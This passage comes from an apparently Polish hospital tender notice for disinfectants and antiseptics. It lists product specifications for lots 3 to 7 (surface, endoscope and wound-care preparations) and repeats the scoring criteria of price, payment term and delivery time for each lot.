proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET 3 - DEZYNFEKCJA POWIERZCHNI<br/>1	Preparat alkoholowy o przyjemnym, cytrynowym zapachu, przeznaczony do dezynfekcji małych powierzchni i miejsc trudnodostępnych, o bardzo dobrych właściwościach czyszczących błyszczących, metalowych powierzchni. Preparat zawierający w swoim składzie wyłącznie jedną substancję czynną – etanol w ilości max. 45g. Bez zawartości glioksalu, aldehydów i QAC. - zakres działania: B (w tym Tbc), Y do 1 minuty. V (HBV, HCV, HIV, Vaccinia, BVDV, Rotawirus, Norowirus, Adenowirus w czasie do 30 sekund), (przebadane zgodnie z PN-EN 16615 warunki brudne - 1 minuta. ) Opakowanie : 1 litr ze spryskiwaczem. Wyrób medyczny.<br/>2	Preparat dezynfekcyjno – myjący w koncentracie na bazie – nadwęglanu sodu. Przeznaczony do mycia i dezynfekcji inkubatorów i stanowisk resuscytacyjnych noworodków. Posiadający skuteczne działanie wobec bakterii, grzybów prątków , wirusów w stężeniu 2 %. Środek musi posiadać instrukcję mycia i dezynfekcji inkubatorów zatwierdzony przez Instytut Matki i Dziecka.<br/>3	Preparat w formie nasączonych chusteczek gotowych do użycia mycia I dezynfekcji powierzchni I głowic USG (w tym wrażliwych na działanie alkoholi I wysoką temperaturę I inkubatorów. Spektrum działania: B,F,Tbc(M. avium, M. terrae, M. tuberculosis), V ( HBV, HCV,HIV, polio, Adeno,Noro)S (Clostridium difficile, Clostridium perfringens, Bacillus subtilis, Bacillus cereus) w czasie 5 min. Zgodny z normą PN-EN 14885. Na bazie wielu składników aktywnych w tym poliaminy, tenzydów I aminoetanolu. Nie zawiera związków uwalniających aktywny tlen, kwasu nadoctowego, chloru, aldehydów, bez aktywatora. Chusteczki powinne posiadać wskazanie do dezynfekcji sprzętu oraz wyposażenia medycznego na oddziałach pediatrycznych I neonatologicznych.<br/>4	Preparat na bazie 2% chlorheksydyny w 70% alkoholu izopropylowym, o szerokim spectrum działania. Działającym na bakterie, prątki, drożdże, wszystkie wirusy osłonkowe łącznie z HBV, HCV I HIV. Przeznaczony do dezynfekcji zewnętrznych części centralnych o obwodowych cewników dożylnych.<br/>5	Chusteczki do szybkiej dezynfekcji i mycia małych powierzchni i wyrobów medycznych włącznie z głowicami USG potwierdzenie producentów. Substancja aktywna bazie czwartorzędowych związków amonowych. Spektrum działania B( łącznie z MRSA), Y w czasie do 1 min., V (HBV, HIV, HCV, Rota, Vaccinia) w czasie 30 sek., Papova/ Polyoma - 2 min. Skuteczne zgodnie z normą PN-EN 16615 ( warunki brudne) - 1 minuta. Roztwór, którym są nasączone nie może posiadać w swoim składzie alkoholi, chloru, aldehydów, fenoli. Posiadające opinię dermatologiczną oraz pozytywną opinię producentów urządzeń ultrasonograficznych. Opakowanie typu „Flowpack” = 100 szt. Wymiar chusteczki min. 18 x 20cm. Gramatura min. = 50g/m2. wykonane z polietylen 100% </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 4 – Dezynfekcja i mycie sprzętu endoskopowego <br/>1.	Płynny koncentrat do manualnej i maszynowej dezynfekcji wysokiego poziomu endoskopów oraz innych wyrobów medycznych, na bazie dwóch substancji czynnych: nadoctowego uzyskiwanego z acetylokaprolaktamu i 3% nadtlenku wodoru. Po aktywacji preparat zachowujący aktywność bójczą do 14 dni lub 50 cykli, przy wielokrotnym użyciu. Działanie bójcze do 5min.: B PN-EN 14561, V PN-EN 14476 (Polio, Adeno), Tbc, F PN-EN 14562, S PN-EN 17126 (Bacillus subtilis, Clostridium difficile). <br/>Preparat w wykazie dopuszczonych preparatów kompatybilnych z myjniami endoskopowymi CHOYANG serii CYW. Opakowania 5l. <br/>PREPARAT KOMPATYBILNY produktem z pozycji 3<br/>2.	Walidowane testy paskowe do poz. nr 1<br/>3.	Preparat pięcioenzymatyczny do mycia zanieczyszczonych endoskopów i innych wyrobów medycznych szybko rozpuszczający zanieczyszczenia organiczne. O wysokich właściwościach myjących. Stężenie użytkowe już od 0,1 %. Skuteczność mycia już po: 1 min. <br/>Produkt do użycia manualnego jak również w myjniach automatycznych. <br/>PREPARAT KOMPATYBILNY Z pozycja nr 1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 5- PRODUKTY DO PŁUKANIA RAN O DZIAŁANIU ANTYBAKTERYJNYM I<br/>1	Preparat do dezynfekcji ran, błon śluzowych, skóry przed iniekcjami, punkcjami, zabiegami chirurgicznymi; bez zawartości alkoholu; zawierający 7,5% powidonu jodowanego z 10% zawartością przyswajalnego jodu (co odpowiada 0,75% jodu w preparacie); skuteczny na: bakterie, prątki, grzyby, wirusy, pierwotniaki i przetrwalniki bakterii oraz Spory. Możliwość stosowania jako koncentrat lub po rozcieńczeniu; Opakowanie 1000ml; produkt leczniczy<br/>2	Sterylny roztwór gotowy do użycia, bezzapachowy, nie wykazujący działania bójczego. Zawierający poliheksanidynę i betadinę, służący do oczyszczania, nawilżania i utrzymania rany oraz opatrunku w stanie wilgotnym jak również do usuwania włóknistych płaszczy/biofilmów z rany w sposób zapewniający ochronę tkanki. Zakres zastosowania preparatu powinien obejmować również rany oparzeniowe I-II stopnia. Preparat przeznaczony do długoterminowego stosowania także w przypadku pacjentów o wrażliwej skórze. Bez zawartości dodatkowych substancji takich jak alkohol, jodopowidon, chlorowodorek oktenidyny.<br/>3	Gotowy do użycia roztwór przeznaczony do dekontaminacji, płukania, pędzlowania jamy ustnej, utrzymania flory fizjologicznej ust i codziennej higieny jamy ustnej. Na bazie poliheksanidyny; skuteczny na bakterie (w tym MDRO Multi-Drug Resistant Organism, np. Staphylococcus aureus, MRSA; Enterococcus hirae; Pseudomonas aeruginosa; Acinetobacter baumannii; Enterococcus faecium (VRE); Klebsiella pneumoniae (ESBL)) oraz grzyby (Candida albicans).<br/>Opakowaniach 250ml; wyrób medyczny<br/>4	Gotowy do użycia, bezbarwny żel wodny przeznaczony do dekontaminacji, oczyszczania i nawilżani jamy nosowej oraz ucha zewnętrznego; na bazie poliheksanidyny; skuteczny na bakterie (w tym MDRO Multi-Drug Resistant Organism, np. Staphylococcus aureus, MRSA; Enterococcus hirae; Pseudomonas aeruginosa; Acinetobacter baumannii; Enterococcus faecium (VRE); Klebsiella pneumoniae (ESBL)) oraz grzyby (Candida albicans); <br/>Opakowaniach 30ml; wyrób medyczny </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 6 - PRODUKTY DO PŁUKANIA RAN O DZIAŁANIU ANTYBAKTERYJNYM II<br/>1	Roztwór ponadtlenkowy stosowany do płukania, nawilżania ran ostrych, penetrujących, szczelinowych o działaniu przeciwdrobnoustrojowym, przeciwzapalnym do płukania nawilżania ran ostrych, przewlekłych o zawartości 40ppm kwasu podchlorawego i 40 ppm podchlorynu sodu o skuteczności potwierdzonej badaniami klinicznymi o obojętnym odczynie pH.<br/>2	Żel ponadtlenkowy stosowany do płukania, nawilżania ostrych ran, penetrujących, szczelinowych o działaniu przeciwdrobnoustrojowym, przeciwzapalnym do płukania nawilżania ran ostrych, przewlekłych o zawartości 60 ppm kwasu podchlorawego i 60 ppm podchlorynu sodu o skuteczności potwierdzonej badaniami klinicznymi o obojętnym odczynie pH. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach całkowitych.<br/>Termin zapłaty nie może być krótszy niż 30 dni oraz dłuższy niż 60 dni zgodnie z art. 8 ust. 3 ustawy <br/>o terminach zapłaty w transakcjach handlowych. Zamawiający wskazuje, iż uzasadnieniem zastosowania dłuższego terminu zapłaty są okoliczności związane z zasadami finansowania Zmawiającego przez publicznego płatnika jakim jest NFZ z tytułu prowadzonej działalności leczniczej stanowiącej podstawową działalność Zamawiającego. <br/>C.	Kryterium „Termin dostawy” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt); (minimalny termin wynosi 2 dni)<br/>b)	opis sposobu oceny ofert dla kryterium „Termin dostawy”: <br/>TD = (OT / OTmin) x 20 pkt <br/>gdzie:<br/>TD - liczba uzyskanych punktów dla kryterium „Termin dostawy” ocenianej oferty<br/>OT – termin dostawy w ofercie ocenianej <br/>OTmin – termin dostawy w ofercie z najkrótszym terminem dostawy<br/>Wykonawca oferuje termin dostawy mieszczący się w przedziale od 2 do 5 dni. Najkrótszy proponowany termin dostawy otrzyma maksymalną ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN ZAPŁATY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Charakterystyka preparatu<br/>Preparat odkażający na bazie dichlorowodorku octenidyny i alkoholu fenoksyetylowego, nie zawierający jodu, stosowany bezpośrednio na błony śluzowe , rany powierzchniowe, oparzenia, . Skuteczny przeciwko bakteriom, grzybom , drożdżakom, wirusom (łącznie HBV, HIV ). Przeznaczony do antyseptyki w ginekologii, dermatologii, , położnictwie, wenerologii. Może być stosowany w okresie ciąży i karmienia. Stosowany bez rozcieńczania. LEK<br/>1.	Preparat odkażający na bazie dichlorowodorku octenidyny i alkoholu fenoksyetylowego, nie zawierający jodu, stosowany bezpośrednio na błony śluzowe , rany powierzchniowe, oparzenia, . Skuteczny przeciwko bakteriom, grzybom , drożdżakom, wirusom (łącznie HBV, HIV ). Przeznaczony do antyseptyki w ginekologii, dermatologii, , położnictwie, wenerologii. Może być stosowany w okresie ciąży i karmienia. Stosowany bez rozcieńczania. LEK </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33631600-8 - Środki antyseptyczne i dezynfekcyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1. Przy wyborze oferty Zamawiający będzie kierował się: kryterium ceny i kryterium „Terminu zapłaty” oraz „Terminu dostawy”. <br/>13.2. Kryteria oceny ofert i ich znaczenie oraz opis sposobu oceny ofert:<br/>A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (60 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>cena = (Cmin / C) x 60 pkt <br/>gdzie:<br/>cena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/>B.	Kryterium „Termin zapłaty” w dniach:<br/>a)	znaczenie kryterium - 20% (20 pkt);<br/>b)	opis sposobu oceny ofert dla kryterium „Termin zapłaty”: <br/>TZ = (TZ / TZmax) x 20 pkt <br/>gdzie:<br/>TZ - liczba uzyskanych punktów dla kryterium „Termin zapłaty” ocenianej oferty<br/>TZ - termin zapłaty w ofercie ocenianej <br/>TZmax - termin zapłaty w ofercie z najdłuższym terminem zapłaty<br/>Wykonawca podaje termin zapłaty w liczbach 